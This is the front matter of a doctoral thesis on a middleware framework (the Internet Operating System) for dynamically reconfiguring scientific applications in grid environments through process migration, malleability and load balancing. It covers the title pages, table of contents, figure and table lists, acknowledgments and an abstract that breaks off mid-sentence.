import gc from pprint import pprint import weakref class Graph(object): def __init__(self, name): self.name = name self.other = None def set_next(self, other): print '%s.set_next(%s (%s))' % (self.name, other, type(other)) self.other = other def all_nodes(self): "Generate the nodes in the graph sequence." yield self n = self.other while n and n.name != self.name: yield n n = n.other if n is self: yield n return def __str__(self): return '->'.join([n.name for n in self.all_nodes()]) def __repr__(self): return '%s(%s)' % (self.__class__.__name__, self.name) def __del__(self): print '(Deleting %s)' % self.name self.set_next(None) class WeakGraph(Graph): def set_next(self, other): if other is not None: # See if we should replace the reference # to other with a weakref. if self in other.all_nodes(): other = weakref.proxy(other) super(WeakGraph, self).set_next(other) return def collect_and_show_garbage(): "Show what garbage is present." print 'Collecting...' n = gc.collect() print 'Unreachable objects:', n print 'Garbage:', pprint(gc.garbage) def demo(graph_factory): print 'Set up graph:' one = graph_factory('one') two = graph_factory('two') three = graph_factory('three') one.set_next(two) two.set_next(three) three.set_next(one) print print 'Graphs:' print str(one) print str(two) print str(three) collect_and_show_garbage() print three = None two = None print 'After 2 references removed:' print str(one) collect_and_show_garbage() print print 'Removing last reference:' one = None collect_and_show_garbage()
Now we can set up a test program using the gc module to help us debug the leak. The DEBUG_LEAK flag causes gc to print information about objects that cannot be seen other than through the reference the garbage collector has to them.
import gc from pprint import pprint import weakref from weakref_graph import Graph, demo, collect_and_show_garbage gc.set_debug(gc.DEBUG_LEAK) print 'Setting up the cycle' print demo(Graph) print print 'Breaking the cycle and cleaning up garbage' print gc.garbage[0].set_next(None) while gc.garbage: del gc.garbage[0] print collect_and_show_garbage()
Even after deleting the local references to the Graph instances in demo(), the graphs all show up in the garbage list and cannot be collected. The dictionaries in the garbage list hold the attributes of the Graph instances. We can forcibly delete the graphs, since we know what they are:
$ python -u weakref_cycle.py Setting up the cycle Set up graph: one.set_next(two (<class 'weakref_graph.Graph'>)) two.set_next(three (<class 'weakref_graph.Graph'>)) three.set_next(one->two->three (<class 'weakref_graph.Graph'>)) Graphs: one->two->three->one two->three->one->two three->one->two->three Collecting... Unreachable objects: 0 Garbage:[] After 2 references removed: one->two->three->one Collecting... Unreachable objects: 0 Garbage:[] Removing last reference: Collecting... gc: uncollectable <Graph 0x10046ff50> gc: uncollectable <Graph 0x10046ff90> gc: uncollectable <Graph 0x10046ffd0> gc: uncollectable <dict 0x100363060> gc: uncollectable <dict 0x100366460> gc: uncollectable <dict 0x1003671f0> Unreachable objects: 6 Garbage:[Graph(one), Graph(two), Graph(three), {'name': 'one', 'other': Graph(two)}, {'name': 'two', 'other': Graph(three)}, {'name': 'three', 'other': Graph(one)}] Breaking the cycle and cleaning up garbage one.set_next(None (<type 'NoneType'>)) (Deleting two) two.set_next(None (<type 'NoneType'>)) (Deleting three) three.set_next(None (<type 'NoneType'>)) (Deleting one) one.set_next(None (<type 'NoneType'>)) Collecting... Unreachable objects: 0 Garbage:[]
And now let’s define a more intelligent WeakGraph class that knows not to create cycles using regular references, but to use a ref when a cycle is detected.
import gc from pprint import pprint import weakref from weakref_graph import Graph, demo class WeakGraph(Graph): def set_next(self, other): if other is not None: # See if we should replace the reference # to other with a weakref. if self in other.all_nodes(): other = weakref.proxy(other) super(WeakGraph, self).set_next(other) return demo(WeakGraph)
Since the WeakGraph instances use proxies to refer to objects that have already been seen, as demo() removes all local references to the objects, the cycle is broken and the garbage collector can delete the objects for us.
$ python weakref_weakgraph.py Set up graph: one.set_next(two (<class '__main__.WeakGraph'>)) two.set_next(three (<class '__main__.WeakGraph'>)) three.set_next(one->two->three (<type 'weakproxy'>)) Graphs: one->two->three two->three->one->two three->one->two->three Collecting... Unreachable objects: 0 Garbage:[] After 2 references removed: one->two->three Collecting... Unreachable objects: 0 Garbage:[] Removing last reference: (Deleting one) one.set_next(None (<type 'NoneType'>)) (Deleting two) two.set_next(None (<type 'NoneType'>)) (Deleting three) three.set_next(None (<type 'NoneType'>)) Collecting... Unreachable objects: 0 Garbage:[]
Caching Objects¶
The ref and proxy classes are considered “low level”. While they are useful for maintaining weak references to individual objects and allowing cycles to be garbage collected, if you need to create a cache of several objects the WeakKeyDictionary and WeakValueDictionary provide a more appropriate API.
As you might expect, the WeakValueDictionary uses weak references to the values it holds, allowing them to be garbage collected when other code is not actually using them.
To illustrate the difference between memory handling with a regular dictionary and WeakValueDictionary, let’s go experiment with explicitly calling the garbage collector again:
import gc from pprint import pprint import weakref gc.set_debug(gc.DEBUG_LEAK) class ExpensiveObject(object): def __init__(self, name): self.name = name def __repr__(self): return 'ExpensiveObject(%s)' % self.name def __del__(self): print '(Deleting %s)' % self def demo(cache_factory): # hold objects so any weak references # are not removed immediately all_refs = {} # the cache using the factory we're given print 'CACHE TYPE:', cache_factory cache = cache_factory() for name in [ 'one', 'two', 'three' ]: o = ExpensiveObject(name) cache[name] = o all_refs[name] = o del o # decref print 'all_refs =', pprint(all_refs) print 'Before, cache contains:', cache.keys() for name, value in cache.items(): print ' %s = %s' % (name, value) del value # decref # Remove all references to our objects except the cache print 'Cleanup:' del all_refs gc.collect() print 'After, cache contains:', cache.keys() for name, value in cache.items(): print ' %s = %s' % (name, value) print 'demo returning' return demo(dict) print demo(weakref.WeakValueDictionary)
Notice that any loop variables that refer to the values we are caching must be cleared explicitly to decrement the reference count on the object. Otherwise the garbage collector would not remove the objects and they would remain in the cache. Similarly, the all_refs variable is used to hold references to prevent them from being garbage collected prematurely.
$ python weakref_valuedict.py CACHE TYPE: <type 'dict'> all_refs ={'one': ExpensiveObject(one), 'three': ExpensiveObject(three), 'two': ExpensiveObject(two)} Before, cache contains: ['three', 'two', 'one'] three = ExpensiveObject(three) two = ExpensiveObject(two) one = ExpensiveObject(one) Cleanup: After, cache contains: ['three', 'two', 'one'] three = ExpensiveObject(three) two = ExpensiveObject(two) one = ExpensiveObject(one) demo returning (Deleting ExpensiveObject(three)) (Deleting ExpensiveObject(two)) (Deleting ExpensiveObject(one)) CACHE TYPE: weakref.WeakValueDictionary all_refs ={'one': ExpensiveObject(one), 'three': ExpensiveObject(three), 'two': ExpensiveObject(two)} Before, cache contains: ['three', 'two', 'one'] three = ExpensiveObject(three) two = ExpensiveObject(two) one = ExpensiveObject(one) Cleanup: (Deleting ExpensiveObject(three)) (Deleting ExpensiveObject(two)) (Deleting ExpensiveObject(one)) After, cache contains: [] demo returning
The WeakKeyDictionary works similarly but uses weak references for the keys instead of the values in the dictionary.
The library documentation for weakref contains this warning:
Warning). | https://pymotw.com/2/weakref/index.html | CC-MAIN-2017-22 | en | refinedweb |
I'm making a prog that converts a bitmap to a kind of binary stencil.
The data that gets written is the image width, followed by a bool signaling if the first pixel is on or not. The data after that is written as a sequence of short values each saying how many pixels to draw or skip.
My problem is that only 3 bytes are being written to the file and the on-off states never seem to flip. I added some debug output and it displays the first pixel on my bmp to have a value of 2293488 when it is black and should be 0.
The problem should be in the highlighted area. Also to test it there needs to be a 24bit bitmap image in the same directory called "test.bmp".
Cheers.Cheers.Code:#include <iostream> #include <fstream> using namespace::std; bool Convert(const char*, const char*); int main() { if(! Convert("test.bmp", "result.dat")) cout << "Error"; else cout << "Success"; cin.ignore(); } // Converts 24bit bmp data to compressed format bool Convert(const char* bmpFile, const char* outFile) { short w, h; char bytes[3]; bool state; int count =0; //Set up streams ifstream in; ofstream out; in.open(bmpFile, ios::binary); if(! in.is_open()) return false; out.open(outFile, ios::out); //Write the image width in.seekg(18, ios::beg); in.read((char *)&w, sizeof w); in.seekg(22, ios::beg); out.write(bytes, 2); in.read((char *)&h, sizeof h); cout << "Width: " << w << endl; cout << "Height: " << h << endl; //Write if first pixel is on or not in.seekg(54,ios::beg); in.read(bytes, 3); if(bytes) state = true; else state = false; out.write((char*)&state, 1); cout << "Pix 1: " << ((int)bytes & 0x00FFFFFF) << endl; cout << "State: " << state << endl; in.seekg(54, ios::beg); for(int y=h; y>0; y--) { for(int x=0; x<w; x++) { in.read((char*)&bytes, 3); if(state) { if(bytes) { count++; } else { out.write((char*)&count, 2); cout << "On: " << count << endl; count = 1; state = false; } } else { if(!bytes) { count++; } else { out.write((char*)&count, 2); cout << "Off: " << count << endl; count = 1; state = true; } } } } cout << "Counter at: " << count << endl; in.close(); out.close(); return true; }/**/ | https://cboard.cprogramming.com/cplusplus-programming/98627-problem-reading-bitmap.html | CC-MAIN-2017-22 | en | refinedweb |
Ok, this warrants some explanation....
I use Windows to program, and up until a few months ago, i always used Microsoft Visual C++ IDE (2010, mainly).
But recently i wanted to start developing projects with multi platforms in mind (desktops only, no mobile), and also to experiment on using multiple compilers on the same project, to start writing portable code (both platform wise and compiler wise).
So, in order to do this, i started using Code::Blocks with both GCC and VC10 as the compilers.
My current project is fairly large, but hadn't been a problem until recently, that is, when compiling using GCC only.
I'll explain further.
When i compile my code using GCC, i get the error "file something.h": No such file or directory.
This would be trivial, if the file didn't actually exist, but i noticed that the problem is with the way GCC handles the relative paths to the included file.
Here's a concrete example:
In the "MaterialManager.h" file, i include:
#include "..\..\Shader Manager\_Manager\Program Shader Manager\ProgShaderManager.h"
Now, say that Renderer includes "MaterialManager.h" (which as above, in turn, includes "ProgShaderManager.h").
The problem, is that after a few nested includes, GCC expands this to something like:
D:\ZTUFF\Projects\EDGE\Source\Engine\Systems\Renderer\Render Engine\_Implementations\Render_GL_MultiPass\..\..\..\..\..\Gameplay\Core Objects\Light Object\..\..\..\Game\State Manager\..\..\Resource Managers\Material Manager\_Manager\MaterialManager.h
And this is what is printed in the build log, right before the "No such file or directory".
In my opinion, the reason it fails, is that it exceeds the maximum path size for relative paths, in WIndows (the large string above, has 250 characters, and i think that when GCC tries to append yet another file name, it exceeds the 260 characters).
I've confirmed this, in that, if i replace any #include path that gives an error, by the it's absolute path, it works.
For example:
"D:\ZTUFF\Projects\EDGE\Source\Engine\Resources\Material Resource\MaterialResource.h"
I thought about prepending a macro of the project source code's absolute path to each #include path, but i would like to avoid if possible.
I should mention again, that VC10 never gave me this sort of problem.
Again, this may end up being a simple thing, that i am simply unaware of, since i'm not that much experienced in GCC, and if someone could enlighten me in how to avoid this problem, I'd be quite thankful.
Thanks in advance, and if there's something that is not clear, I'll work to explain it better. | https://www.gamedev.net/topic/660367-include-file-not-found-in-gcc-due-to-path-size/ | CC-MAIN-2017-22 | en | refinedweb |
libraries change hardware state and should be deinitialized when they
are no longer needed. To do so, either call
deinit() or use a
context manager.
For example:
import bitbangio from board import * with bitbangio.I2C(SCL, SDA) as i2c: i2c.scan()
This example will initialize the the device, run
scan() and then
deinit() the
hardware. | http://circuitpython.readthedocs.io/en/latest/shared-bindings/bitbangio/__init__.html | CC-MAIN-2017-22 | en | refinedweb |
How To Construct Classes and Define Objects in Python 3
Introduction
Python is an object-oriented programming language..
One of the most important concepts in object-oriented programming is the distinction between classes and objects, which are defined as follows:
- Class — A blueprint created by a programmer for an object. This defines a set of attributes that will characterize any object that is instantiated from this class.
- Object — An instance of a class. This is the realized version of the class, where the class is manifested in the program.
These are used to create patterns (in the case of classes) and then make use of the patterns (in the case of objects).
In this tutorial, we’ll go through creating classes, instantiating objects, initializing attributes with the constructor method, and working with more than one object of the same class.
Classes
Classes are like a blueprint or a prototype that you can define to use to create objects.
We define classes by using the
class keyword, similar to how we define functions by using the
def keyword.
Let’s define a class called
Shark that has two functions associated with it, one for swimming and one for being awesome:
class Shark: def swim(self): print("The shark is swimming.") def be_awesome(self): print("The shark is being awesome.")
Because these functions are indented under the class
Shark, they are called methods. Methods are a special kind of function that are defined within a class.
The argument to these functions is the word
self, which is a reference to objects that are made based on this class. To reference instances (or objects) of the class,
self will always be the first parameter, but it need not be the only one.
Defining this class did not create any
Shark objects, only the pattern for a
Shark object that we can define later. That is, if you run the program above at this stage nothing will be returned.
Creating the
Shark class above provided us with a blueprint for an object.
Objects
An object is an instance of a class. We can take the
Shark class defined above, and use it to create an object or instance of it.
We’ll make a
Shark object called
sammy:
sammy = Shark()
Here, we initialized the object
sammy as an instance of the class by setting it equal to
Shark().
Now, let’s use the two methods with the
Shark object
sammy:
sammy = Shark() sammy.swim() sammy.be_awesome()
The
Shark object
sammy is using the two methods
swim() and
be_awesome(). We called these using the dot operator (
.), which is used to reference an attribute of the object. In this case, the attribute is a method and it’s called with parentheses, like how you would also call with a function.
Because the keyword
self was a parameter of the methods as defined in the
Shark class, the
sammy object gets passed to the methods. The
self parameter ensures that the methods have a way of referring to object attributes.
When we call the methods, however, nothing is passed inside the parentheses, the object
sammy is being automatically passed with the dot operator.
Let’s add the object within the context of a program:
class Shark: def swim(self): print("The shark is swimming.") def be_awesome(self): print("The shark is being awesome.") def main(): sammy = Shark() sammy.swim() sammy.be_awesome() if __name__ == "__main__": main()
Let’s run the program to see what it does:
- python shark.py
OutputThe shark is swimming. The shark is being awesome.
The object
sammy calls the two methods in the
main() function of the program, causing those methods to run.
The Constructor Method
The constructor method is used to initialize data. It is run as soon as an object of a class is instantiated. Also known as the
__init__ method, it will be the first definition of a class and looks like this:
class Shark: def __init__(self): print("This is the constructor method.")
If you added the above
__init__ method to the
Shark class in the program above, the program would output the following without your modifying anything within the
sammy instantiation:
OutputThis is the constructor method. The shark is swimming. The shark is being awesome.
This is because the constructor method is automatically initialized. You should use this method to carry out any initializing you would like to do with your class objects.
Instead of using the constructor method above, let’s create one that uses a
name variable that we can use to assign names to objects. We’ll pass
name as a parameter and set
self.name equal to
name:
class Shark: def __init__(self, name): self.name = name
Next, we can modify the strings in our functions to reference the names, as below:
class Shark: def __init__(self, name): self.name = name def swim(self): # Reference the name print(self.name + " is swimming.") def be_awesome(self): # Reference the name print(self.name + " is being awesome.")
Finally, we can set the name of the
Shark object
sammy as equal to
"Sammy" by passing it as a parameter of the
Shark class:
class Shark: def __init__(self, name): self.name = name def swim(self): print(self.name + " is swimming.") def be_awesome(self): print(self.name + " is being awesome.") def main(): # Set name of Shark object sammy = Shark("Sammy") sammy.swim() sammy.be_awesome() if __name__ == "__main__": main()
We can run the program now:
- python shark.py
OutputSammy is swimming. Sammy is being awesome.
We see that the name we passed to the object is being printed out. We defined the
__init__ method with the parameter name (along with the
self keyword) and defined a variable within the method.
Because the constructor method is automatically initialized, we do not need to explicitly call it, only pass the arguments in the parentheses following the class name when we create a new instance of the class.
If we wanted to add another parameter, such as
age, we could do so by also passing it to the
__init__ method:
class Shark: def __init__(self, name, age): self.name = name self.age = age
Then, when we create our object
sammy, we can pass Sammy’s age in our statement:
sammy = Shark("Sammy", 5)
To make use of
age, we would need to also create a method in the class that calls for it.
Constructor methods allow us to initialize certain attributes of an object.
Working with More Than One Object
Classes are useful because they allow us to create many similar objects based on the same blueprint.
To get a sense for how this works, let’s add another
Shark object to our program:()
We have created a second
Shark object called
stevie and passed the name
"Stevie" to it. In this example, we used the
be_awesome() method with
sammy and the
swim() method with
stevie.
Let’s run the program:
- python shark.py
OutputSammy is being awesome. Stevie is swimming.
The output shows that we are using two different objects, the
sammy object and the
stevie object, both of the
Shark class.
Classes make it possible to create more than one object following the same pattern without creating each one from scratch.
Conclusion in another. Object-oriented programs also make for better program design since complex programs are difficult to write and require careful planning, and this in turn makes it less work to maintain the program over time. | https://www.digitalocean.com/community/tutorials/how-to-construct-classes-and-define-objects-in-python-3 | CC-MAIN-2017-22 | en | refinedweb |
Opened 4 years ago
Closed 4 years ago
Last modified 4 years ago
#20584 closed Bug (needsinfo)
Django's Memcached backend get_many() doesn't handle generators
Description
When the "keys" parameter to get_many() is a generator, the values will be lost in the zip function.
Here's a simplified code example:
def make_key(k): return k user_ids = (11387, 1304318) keys = ('user_%d' % x for x in user_ids) new_keys = map(lambda x: make_key(x), keys) m = dict(zip(new_keys, keys)) assert( m == {} )
I believe this is related to this zip() behaviour:
I encountered this bug when upgrading from django 1.3 to django 1.5.1
Change History (2)
comment:1 Changed 4 years ago by
comment:2 Changed 4 years ago by
Ah, I misunderstood the problem myself, makes sense now. It worked in a previous version because the generator was not exhausted there.
thanks a lot, makes sense now
Hi,
The code example shows the expected behavior of a generator: once you iterate over it, it's empty.
Can you describe the actual bug you're encountering in your django application?
The commit that added the line you linked to [1] was already included in 1.3 so your problem must be elsewhere.
I'm going to mark this as
needsinfo. Please re-open the ticket with an example on how you trigger the issue from django.
Thanks.
[1] | https://code.djangoproject.com/ticket/20584 | CC-MAIN-2017-22 | en | refinedweb |
A FRAMEWORK FOR THE DYNAMIC
RECONFIGURATION OF SCIENTIFIC APPLICATIONS
IN GRID ENVIRONMENTS
By
Kaoutar El Maghraoui
A Thesis Submitted to the Graduate
Faculty of Rensselaer Polytechnic Institute
in Partial Fulfillment of the
Requirements for the Degree of
DOCTOR OF PHILOSOPHY
Major Subject:Computer Science
Approved by the)
A FRAMEWORK FOR THE DYNAMIC
RECONFIGURATION OF SCIENTIFIC APPLICATIONS
IN GRID ENVIRONMENTS
By
Kaoutar El Maghraoui
An Abstract of a Thesis Submitted to the Graduate
Faculty of Rensselaer Polytechnic Institute
in Partial Fulfillment of the
Requirements for the Degree of
DOCTOR OF PHILOSOPHY
Major Subject:Computer Science
The original of the complete thesis is on file
in the Rensselaer Polytechnic Institute Library)
c Copyright 2007
by
Kaoutar El Maghraoui
ii
CONTENTS
LIST OF FIGURES................................vii
LIST OF TABLES.................................xi
ACKNOWLEDGMENTS.............................xii
ABSTRACT....................................xiv
1.Introduction...................................1
1.1 Motivation and Research Challenges..................2
1.1.1 Mobility and Malleability for Fine-grained Reconfiguration..3
1.1.2 Middleware-driven Dynamic Application Reconfiguration...6
1.2 Problem Statement and Methodology..................8
1.3 Thesis Contributions...........................10
1.4 Thesis Roadmap.............................11
2.Background and Related Work.........................13
2.1 Grid Middleware Systems........................14
2.2 Resource Management in Grid Systems.................16
2.2.1 Resource Management in Globus................18
2.2.2 Resource Management in Condor................20
2.2.3 Resource Management in Legion.................21
2.2.4 Other Grid Resource Management Systems...........22
2.3 Adaptive Execution in Grid Systems..................23
2.4 Grid Programming Models........................25
2.5 Peer-to-Peer Systems and the Emerging Grid..............28
2.6 Worldwide Computing..........................31
iii
2.6.1 The Actor Model.........................31
2.6.2 The SALSA Programming Language..............33
2.6.3 Theaters and Run-Time Components..............36
3.A Middleware Framework for Adaptive Distributed Computing.......37
3.1 Design Goals...............................38
3.1.1 Middleware-level Issues......................38
3.1.2 Application-level Issues......................39
3.2 A Model for Reconfigurable Grid-Aware Applications.........40
3.2.1 Characteristics of Grid Environments..............40
3.2.2 A Grid Application Model....................42
3.3 IOS Middleware Architecture......................47
3.3.1 The Profiling Module.......................48
3.3.2 The Decision Module.......................51
3.3.3 The Protocol Module.......................52
3.4 The Reconfiguration and Profiling Interfaces..............53
3.4.1 The Profiling API.........................53
3.4.2 The Reconfiguration Decision API................55
3.5 Case Study:Reconfigurable SALSA Actors...............56
3.6 Chapter Summary............................57
4.Reconfiguration Protocols and Policies....................60
4.1 Network-Sensitive Virtual Topologies..................60
4.1.1 The Peer-to-Peer Topology...................61
4.1.2 The Cluster-to-Cluster Topology................62
4.1.3 Presence Management......................62
4.2 Autonomous Load Balancing Strategies.................63
4.2.1 Information Policy........................65
4.2.2 Transfer Policy..........................67
4.2.3 Peer Location Policy.......................69
4.2.4 Load Balancing and the Virtual Topology...........70
4.3 The Selection Policy...........................71
4.3.1 The Resource Sensitive Model..................71
4.3.2 Migration Granularity......................74
4.4 Split and Merge Policies.........................75
iv
4.4.1 The Split Policy..........................75
4.4.2 The Merge Policy.........................76
4.5 Related Work...............................77
4.6 Chapter Summary............................79
5.Reconfiguring MPI Applications........................80
5.1 Motivation.................................81
5.2 Approach to Reconfigurable MPI Applications.............82
5.2.1 The Computational Model....................82
5.2.2 Process Migration.........................84
5.2.3 Process Malleability.......................85
5.3 The Process Checkpointing Migration and Malleability Library....88
5.3.1 The PCM API..........................89
5.3.2 Instrumenting an MPI Program with PCM...........92
5.4 The Runtime Architecture........................92
5.4.1 The PCMD Runtime System..................96
5.4.2 The Profiling Architecture....................98
5.4.3 A Simple Scenario for Adaptation................99
5.5 The Middleware Interaction Protocol..................101
5.5.1 Actor Emulation.........................101
5.5.2 The Proxy Architecture.....................102
5.5.3 Protocol Messages........................102
5.6 Related Work...............................105
5.6.1 MPI Reconfiguration.......................105
5.6.2 Malleability............................107
5.7 Summary and Discussion.........................109
6.Performance Evaluation............................111
6.1 Experimental Testbed..........................111
6.2 Applications Case Studies........................112
6.2.1 Heat Diffusion Problem......................112
6.2.2 Search for the Galactic Structure................114
6.2.3 SALSA Benchmarks.......................114
6.3 Middleware Evaluation..........................115
6.3.1 Application-sensitive Reconfiguration Results.........115
v
6.3.2 Experiments with Dynamic Networks..............116
6.3.3 Experiments with Virtual Topologies..............119
6.3.4 Single vs.Group Migration...................125
6.3.5 Overhead Evaluation.......................125
6.4 Adaptation Experiments with Iterative MPI Applications.......128
6.4.1 Profiling Overhead........................129
6.4.2 Reconfiguration Overhead....................129
6.4.3 Performance Evaluation of MPI/IOS Reconfiguration.....131
6.4.3.1 Migration Experiments.................131
6.4.3.2 Split and Merge Experiments.............132
6.5 Summary and Discussion.........................135
7.Conclusions and Future Work.........................138
7.1 Other Application Models........................139
7.2 Large-scale Deployment and Security..................140
7.3 Replication as Another Reconfiguration Strategy............141
7.4 Scalable Profiling and Measurements..................141
7.5 Clustering Techniques for Resource Optimization...........142
7.6 Automatic Programming.........................142
7.7 Self-reconfigurable Middleware......................142
References......................................144
vi
LIST OF FIGURES
1.1 Execution time without and with autonomous migration in a dynamic
run-time environment.............................4
1.2 Execution time with different entity granularities in a static run-time
environment..................................5
1.3 Throughput as the process data granularity decreases on a dedicated node.6
2.1 A layered grid architecture and components (Adapted from [14]).....15
2.2 Sample peer-to-peer topologies:centralized,decentralized and hybrid
topologies...................................30
2.3 A Model for Worldwide Computing.Applications run on a virtual net-
work (a middleware infrastructure) which maps actors to locations in the
physical layer (the hardware infrastructure)................32
2.4 The primitive operations of an actor.In response to a message,an actor
can:a) change its internal state by invoking one of its internal methods,
b) send a message to another actor,or c) create a new actor.......33
2.5 Skeleton of a SALSA program.The skeleton shows simple examples of
actor creation,message sending,coordination,and migration......34
3.1 Interactions between reconfigurable applications,the middleware ser-
vices,and the grid resources.........................42
3.2 A state machine showing the configuration states of an application at
reconfiguration points............................43
3.3 Model for a grid-aware application.....................46
3.4 The possible states of a reconfigurable entity................48
vii
3.5 IOS Agents consist of three modules:a profiling module,a protocol mod-
ule and a decision module.The profiling module gathers performance
profiles about the entities executing locally,as well as the underlying
hardware.The protocol module gathers information from other agents.
The decision module takes local and remote information and uses it to
decide how the application entities should be reconfigured........49
3.6 Architecture of the profiling module:this module interfaces with high-
level applications and with local resources and generates application per-
formance profiles and machine performance profiles............50
3.7 Interactions between the profiling module and the Network Weather Ser-
vice (NWS) components...........................51
3.8 Interactions between a reconfigurable application and the local IOS agent.52
3.9 IOS Profiling API..............................54
3.10 IOS Reconfiguration API..........................58
3.11 A UML class diagram of the main SALSA/IOS Actor classes and behav-
iors.The diagram shows the relationships between the Actor,Univer-
salActor,AutonomousActor,and MalleableActor classes.........59
4.1 The peer-to-peer virtual network topology.Middleware agents repre-
sent heterogeneous nodes,and communicate with groups or peer agents.
Information is propagated through the virtual network via these commu-
nication links.................................61
4.2 The cluster-to-cluster virtual network topology.Homogeneous agents
elect a cluster manager to perform intra and inter cluster load balancing.
Clusters are dynamically created and readjusted as agents join and leave
the virtual network..............................62
4.3 Scenarios of joining and leaving the IOS virtual network:(a) A node joins
the virtual network through a peer server,(b) A node joins the virtual
network through an existing peer,(c) A node leaves the virtual network.64
4.4 Algorithm for joining an existing virtual network and finding peer nodes.64
4.5 An example that shows the propagation of work-stealing packets across
the peers until an overloaded node is reached.The example shows the
request starting with a time-to-live (TTL) of 5.The TTL is decremented
by each forwarding node until it reaches the value of 0,then the packet
is no longer propagated............................65
4.6 Information exchange between peer agents using work-stealing request
messages....................................68
viii
4.7 Plots of the expected gain decision function versus the process remaining
lifetime with different values of the number of migrations in the past.
The remaining lifetime is assumed to have a half-life time expectancy..73
5.1 Steps involved in communicator handling to achieve MPI process migration..85
5.2 Example M to N split operations......................87
5.3 Example M to N merge operations.....................87
5.4 Examples of domain decomposition strategies showing block,column,
and diagonal decompositions for a 3D data-parallel problem.......88
5.5 Skeleton of the original MPI code of an MPI application.........93
5.6 Skeleton of the malleable MPI code with PCM calls:initialization phase.94
5.7 Skeleton of the malleable MPI code with PCM calls:iteration phase...95
5.8 The layered design of MPI/IOS which includes the MPI wrapper,the PCM
runtime layer,and the IOS runtime layer...................96
5.9 Architecture of a node running MPI/IOS enabled applications........97
5.10 Library and executable structure of an MPI/IOS application.......98
5.11 A reconfiguration scenario of an MPI/IOS application...........100
5.12 IOS/MPI proxy software architecture....................103
5.13 The packet format of MPI/IOS proxy control and profiling messages...105
6.1 The two-dimensional heat diffusion problem................112
6.2 Parallel decomposition of the 2D heat diffusion problem..........113
6.3 Performance of the massively parallel unconnected benchmark......116
6.4 Performance of the massively parallel sparse benchmark..........117
6.5 Performance of the highly synchronized tree benchmark..........117
6.6 Performance of the highly synchronized hypercube benchmark......118
6.7 The tree topology on a dynamic environment using ARS and RS.....119
6.8 The unconnected topology on a dynamic environment using ARS and RS.120
6.9 The hypercube application topology on Internet-like environments....121
6.10 The hypercube application topology on Grid-like environments......121
ix
6.11 The tree application topology on Internet-like environments.......122
6.12 The tree application topology on Grid-like environments.........122
6.13 The sparse application topology on Internet-like environments......123
6.14 The sparse application topology on Grid-like environments........123
6.15 The unconnected application topology on Internet-like environments...124
6.16 The unconnected application topology on Grid-like environments....124
6.17 Single vs.group migration for the unconnected application topology...125
6.18 Single vs.group migration for the sparse application topology......126
6.19 Single vs.group migration for the tree application topology........126
6.20 Single vs.group migration for the hypercube application topology....127
6.21 Overhead of using SALSA/IOS on a massively parallel astronomic data-
modeling application with various degrees of parallelism on a static en-
vironment...................................127
6.22 Overhead of using SALSA/IOS on a tightly synchronized two-
dimensional heat diffusion application with various degrees of parallelism
on a static environment...........................128
6.23 Overhead of the PCM library........................129
6.24 Total running time of reconfigurable and non-reconfigurable execution
scenarios for different problem data sizes for the heat diffusion application.130
6.25 Breakdown of the reconfiguration overhead for the experiment of Fig-
ure 6.24....................................130
6.26 Performance of the heat diffusion application using MPICH2 and
MPICH2 with IOS..............................133
6.27 The expansion and shrinkage capability of the PCM library.......134
6.28 Adaptation using malleability and migration as resources leave and join 135
6.29 Dynamic reconfiguration using malleability and migration compared to
dynamic reconfiguration using migration alone in a dynamic virtual net-
work of IOS agents.The virtual network was varied from 8 to 12 to
16 to 15 to 10 to 8 processors.Malleable entities outperformed solely
migratable entities on average by 5%....................136
x
LIST OF TABLES
2.1 Layers of the grid architecture........................16
2.2 Characteristics of some grid resource management systems........18
2.3 Examples of a Universal Actor Name (UAN) and a Universal Actor Lo-
cator (UAL)..................................35
2.4 Some Java concepts and analogous SALSA concepts............35
4.1 The range of communication latencies to group the list of peer hosts...69
5.1 The PCM API................................90
5.2 The structure of the assigned UAN/UAL pair for MPI processes at the
MPI/IOS proxy................................102
5.3 Proxy control message types.........................104
5.4 Proxy profiling message types........................104
xi
ACKNOWLEDGMENTS
It is with great pleasure that I wish to acknowledge several people that have helped
me tremendously during the difficult,challenging,yet rewarding and exciting path
towards a Ph.D.Without their help and support,none of this work could have been
possible.
First and foremost,I am greatly indebted to my advisor Dr.Carlos A.Varela
for his guidance,encouragement,motivation,and continued support throughout my
academic years at RPI.Carlos has allowed me to pursue my research interests with
sufficient freedom,while always being there to guide me.Working with him has been
one of the most rewarding experiences of my professional life.
I am also deeply indebted to Professor Boleslaw K.Szymanski,my committee
member,for supporting my work.He has been very instrumental to the realization
of this work through his keen guidance and encouragement.Working with him has
been a great pleasure.I am also very thankful to the rest of my committee members,
Dr.Joseph E.Flaherty,Dr.Ian Foster,Dr.Franklin Luk,and Dr.James D.Teresco.
I am grateful to them for agreeing to serve on my committee and for their valuable
suggestions and comments.
Special thanks go to my colleague,Travis Desell for his key contributions to
the design and development of the Internet Operating System middleware.Many
thanks go also to the rest of the Worldwide Computing laboratory members,Wei-Jen
Wang,Jason LaPorte,Jiao Tao,and Brian Boodman for their valuable comments
and constructive criticism.My fruitful discussions and interactions with them helped
me grow professionally.
xii
I am grateful to the administrative staff of the Computer Science department,
who have spared no efforts helping me in various aspects of my academic life at RPI.
They were some of the best people I have ever worked with.In particular,I would like
to thank Pamela Paslow for her constant help and for also being a true friend.She
was always there for me in easy and difficult times.She has kept me on top of all the
necessary paperwork.I would like also to thank Jacky Carley,Shannon Carrothers,
Chris Coonrad,and Steven Lindsey.
I have been fortunate to have met great friends throughout my Ph.D journey.
They have bestowed so much love on me.I amforever grateful for their moral support,
encouragement,and true friendship.In particular I would like to thank Bouchra
Bouqata,Houda Lamehamedi,Fatima Boussetta,and Khadija Omo-meriem.Special
thanks go to Rebiha Chekired for caring for my baby,Zayneb,during the last year of
my Ph.D.She acted as a loving and caring second mother to my baby during times
I could not be around.I am forever grateful to her.
Last but not least,I am forever indebted to my husband,Bouchaib Cherif,my
parents,my sisters Hajar and Meriem,my brother Ahmed,and the rest of my family.
My husband has been a great source of inspiration to me.None of this would have
been possible without his love,support,and continuous encouragement.My parents’
prayers have always accompanied me.Their love keeps me going.My daughter
Zayneb has been the greatest source of motivation and inspiration during the last
year of my Ph.D.I am very lucky to have been blessed with her.I am grateful to all
of them.This work is dedicated to my family.
xiii
ABSTRACT
Advances in hardware technologies are constantly pushing the limits of processing,
networking,and storage resources,yet there are always applications whose computa-
tional demands exceed even the fastest technologies available.It has become critical
to look into ways to efficiently aggregate distributed resources to benefit a single ap-
plicationfigure to adjust to the dynamics
of the underlying resources.
To realize this vision,we have developed the Internet Operating System (IOS),
a framework for middleware-driven application reconfiguration in dynamic execution
environments.Its goal is to provide high performance to individual applications in
